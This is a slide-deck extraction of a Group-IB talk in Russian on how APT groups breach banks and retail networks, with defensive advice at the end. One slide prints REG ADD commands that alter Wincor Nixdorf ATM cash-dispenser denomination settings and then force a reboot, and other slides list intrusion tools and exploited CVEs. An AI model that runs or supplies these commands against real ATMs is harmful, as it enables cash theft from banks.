39
Никита Кислицин, Group-IB

Defcon Moscow #0x0A - Nikita Kislitsin APT "Advanced Persistent Threats"

Embed Size (px)

Citation preview

Page 1: Defcon Moscow #0x0A - Nikita Kislitsin APT "Advanced Persistent Threats"

Никита Кислицин,Group-IB

Page 2: Defcon Moscow #0x0A - Nikita Kislitsin APT "Advanced Persistent Threats"

2

Происходят плохие вещи

— Взломали платежную систему, украли прибыль за 3 года

— Взломали банк, продали доллары по 55, через 17 минут купили по 65

— Взломали банк, получили доступ к сети с банкоматами, вынули наличных на 20 млн. руб.

— Взломали сеть POS-терминалов торговой сети, украли 70 млн. карт

— Взломали крупный интернет-сервис, слили базу и исходники

Page 3: Defcon Moscow #0x0A - Nikita Kislitsin APT "Advanced Persistent Threats"

3

1. Заражение хостов в инфраструктуре

— Социальная инженерия, вредоносные вложения* CVE-2012-2539, CVE-2012-0158, CVE-2015-5119, etc.* Очень-важный-договор.scr* Реквизиты.doc.cpl

— Drive-By-Download* Niterix, Spartanб Angler, SunDown, etc.* Форумы и «Прогружу ваш софт»

Page 4: Defcon Moscow #0x0A - Nikita Kislitsin APT "Advanced Persistent Threats"

4

2. Понимание того, куда попали боты

#!/usr/bin/pythonimport osfrom bulkwhois.shadowserver import BulkWhoisShadowserveriplist_file = ‘ip.txt’path = os.path.dirname(os.path.abspath(__file__))bulk_whois = BulkWhoisShadowserver()iplist = []with open(os.path.join(path, iplist_file)) as f: for line in f: iplist.append(line.strip()) result = bulk_whois.lookup_ips(iplist)

Page 5: Defcon Moscow #0x0A - Nikita Kislitsin APT "Advanced Persistent Threats"

5

3. Поднятие привилегий и доступ к нужным хостам/приложениям

- Mimikatz- Caen& Abel- Linux/Ssemgrvd sshd Backdoor- RDPDoor, Poison Ivy- Amyy Admin, Team Viewer- Meterpreter- SoftPerfect, etc.

Page 6: Defcon Moscow #0x0A - Nikita Kislitsin APT "Advanced Persistent Threats"

6

4. Вывод денег

REG ADD “HKEY_LOCAL_MACHINE\SOFTWARE\Wincor Nixdorf\ProTopas\CurrentVersion\LYNXPAR\CASH_DISPENSER”/v VALUE_1 /t REG_SZ/d “5000” /fREG ADD “HKEY_LOCAL_MACHINE\SOFTWARE\Wincor Nixdorf\ProTopas\CurrentVersion\LYNXPAR\CASH_DISPENSER”/v VALUE_2 /t REG_SZ/d “1000” /fREG ADD “HKEY_LOCAL_MACHINE\SOFTWARE\Wincor Nixdorf\ProTopas\CurrentVersion\LYNXPAR\CASH_DISPENSER”/v VALUE_3 /t REG_SZ

/d “500” /fREG ADD “HKEY_LOCAL_MACHINE\SOFTWARE\Wincor Nixdorf\ProTopas\CurrentVersion\LYNXPAR\CASH_DISPENSER”/v VALUE_4 /t REG_SZ/d “100” /fREG ADD “HKEY_LOCAL_MACHINE\SOFTWARE\Wincor Nixdorf\ProTopas\CurrentVersion\LYNXPAR\CASH_DISPENSER”/v VALUE_1 /t REG_SZ/d “100” /fREG ADD “HKEY_LOCAL_MACHINE\SOFTWARE\Wincor Nixdorf\ProTopas\CurrentVersion\LYNXPAR\CASH_DISPENSER”/v VALUE_4 /t REG_SZ/d “5000” /fshutdown -r -t 0 –f

Page 7: Defcon Moscow #0x0A - Nikita Kislitsin APT "Advanced Persistent Threats"

7

Page 8: Defcon Moscow #0x0A - Nikita Kislitsin APT "Advanced Persistent Threats"

8

Page 9: Defcon Moscow #0x0A - Nikita Kislitsin APT "Advanced Persistent Threats"

ANUNAK• 200 ботов• 1 млрд рублей хищений

Page 10: Defcon Moscow #0x0A - Nikita Kislitsin APT "Advanced Persistent Threats"
Page 11: Defcon Moscow #0x0A - Nikita Kislitsin APT "Advanced Persistent Threats"
Page 12: Defcon Moscow #0x0A - Nikita Kislitsin APT "Advanced Persistent Threats"
Page 13: Defcon Moscow #0x0A - Nikita Kislitsin APT "Advanced Persistent Threats"
Page 14: Defcon Moscow #0x0A - Nikita Kislitsin APT "Advanced Persistent Threats"

CORKOW• 400.000 ботов• Сумма балансов ботов:

> 6500 млн. рублей• Направленные атаки на

банковский сектор

Page 15: Defcon Moscow #0x0A - Nikita Kislitsin APT "Advanced Persistent Threats"

15

Page 16: Defcon Moscow #0x0A - Nikita Kislitsin APT "Advanced Persistent Threats"

16

Page 17: Defcon Moscow #0x0A - Nikita Kislitsin APT "Advanced Persistent Threats"

t d s . g r o u p - i b . r u

86%компьютеров в ботнетах имеют установленное антивирусное средство

1.5Mкомпьютеров в Россиизаразил ботнет Carberp

Использование антивирусов на зараженных компьютерах

8%14%

16%

7%44%

11%

Нет антивируса KasperskyMicrosoftSymantec

Dr WebДругие

17

Page 18: Defcon Moscow #0x0A - Nikita Kislitsin APT "Advanced Persistent Threats"
Page 19: Defcon Moscow #0x0A - Nikita Kislitsin APT "Advanced Persistent Threats"
Page 20: Defcon Moscow #0x0A - Nikita Kislitsin APT "Advanced Persistent Threats"

20

• 1,789/127 магазиновв США/Канаде

• 127/37 складовв США/Канаде

• 361,000 сотрудников• Target.com

Page 21: Defcon Moscow #0x0A - Nikita Kislitsin APT "Advanced Persistent Threats"

21

Page 22: Defcon Moscow #0x0A - Nikita Kislitsin APT "Advanced Persistent Threats"

22

Page 23: Defcon Moscow #0x0A - Nikita Kislitsin APT "Advanced Persistent Threats"

23

Page 24: Defcon Moscow #0x0A - Nikita Kislitsin APT "Advanced Persistent Threats"

24

Page 25: Defcon Moscow #0x0A - Nikita Kislitsin APT "Advanced Persistent Threats"

25

Page 26: Defcon Moscow #0x0A - Nikita Kislitsin APT "Advanced Persistent Threats"

26

Page 27: Defcon Moscow #0x0A - Nikita Kislitsin APT "Advanced Persistent Threats"

27

Page 28: Defcon Moscow #0x0A - Nikita Kislitsin APT "Advanced Persistent Threats"

28

Page 29: Defcon Moscow #0x0A - Nikita Kislitsin APT "Advanced Persistent Threats"

29

Brian DyeSymantec Senior VP: «Antivirusis dead»** WSJ, MAY-14

Page 30: Defcon Moscow #0x0A - Nikita Kislitsin APT "Advanced Persistent Threats"

Выявление всех актуальных угроз, включая мобильные

Выгодный аутсорс анализа сетевых инцидентовв CERT-GIB

Ежедневные обновления правил и сигнатур

Анализ полосы до 5 Гбит/сек компактным1U-решением

Page 31: Defcon Moscow #0x0A - Nikita Kislitsin APT "Advanced Persistent Threats"

Выявление всех актуальных угроз, включая мобильные

Выгодный аутсорс анализа сетевых инцидентовв CERT-GIB

Ежедневные обновления правил и сигнатур

Анализ полосы до 5 Гбит/сек компактным1U-решением

Page 32: Defcon Moscow #0x0A - Nikita Kislitsin APT "Advanced Persistent Threats"

Выявление всех актуальных угроз, включая мобильные

Выгодный аутсорс анализа сетевых инцидентовв CERT-GIB

Ежедневные обновления правил и сигнатур

Анализ полосы до 5 Гбит/сек компактным1U-решением

Page 33: Defcon Moscow #0x0A - Nikita Kislitsin APT "Advanced Persistent Threats"

Выявление всех актуальных угроз, включая мобильные

Выгодный аутсорс анализа сетевых инцидентовв CERT-GIB

Ежедневные обновления правил и сигнатур

Анализ полосы до 5 Гбит/сек компактным1U-решением

Page 34: Defcon Moscow #0x0A - Nikita Kislitsin APT "Advanced Persistent Threats"

Выявление всех актуальных угроз, включая мобильные

Выгодный аутсорс анализа сетевых инцидентовв CERT-GIB

Ежедневные обновления правил и сигнатур

Анализ полосы до 5 Гбит/сек компактным1U-решением

Page 35: Defcon Moscow #0x0A - Nikita Kislitsin APT "Advanced Persistent Threats"

Выявление всех актуальных угроз, включая мобильные

Выгодный аутсорс анализа сетевых инцидентовв CERT-GIB

Ежедневные обновления правил и сигнатур

Анализ полосы до 5 Гбит/сек компактным1U-решением

Page 36: Defcon Moscow #0x0A - Nikita Kislitsin APT "Advanced Persistent Threats"

36

ИБ-вендоры предлагают купить новое(теперь-то действенное!) решение проблемы

— Мой super advanced anti-APT лучше твоего, у меня песочница и классификатор на тыщу фич

— Твоя песочница уже не торт, мы используем чистую математику и чистую магию: детектируем все, не анализируя ничего

Page 37: Defcon Moscow #0x0A - Nikita Kislitsin APT "Advanced Persistent Threats"

37

Page 38: Defcon Moscow #0x0A - Nikita Kislitsin APT "Advanced Persistent Threats"

38

Что надо было делать до инцидентов

— В организации процессов исходить из того, что компьютер(ы) в сети уже заражены

— Хорошо и глубоко писать логи по соединениям (netflow, http-log, passivedns)

— Объективно изучать пользовательский трафик, вместо того чтобы ставить очередное хостовое решение

— Довериться вендорам, которые знают и постоянно изучают реальные угрозы в вашем регионе

Page 39: Defcon Moscow #0x0A - Nikita Kislitsin APT "Advanced Persistent Threats"

Никита Кислицин,Group-IB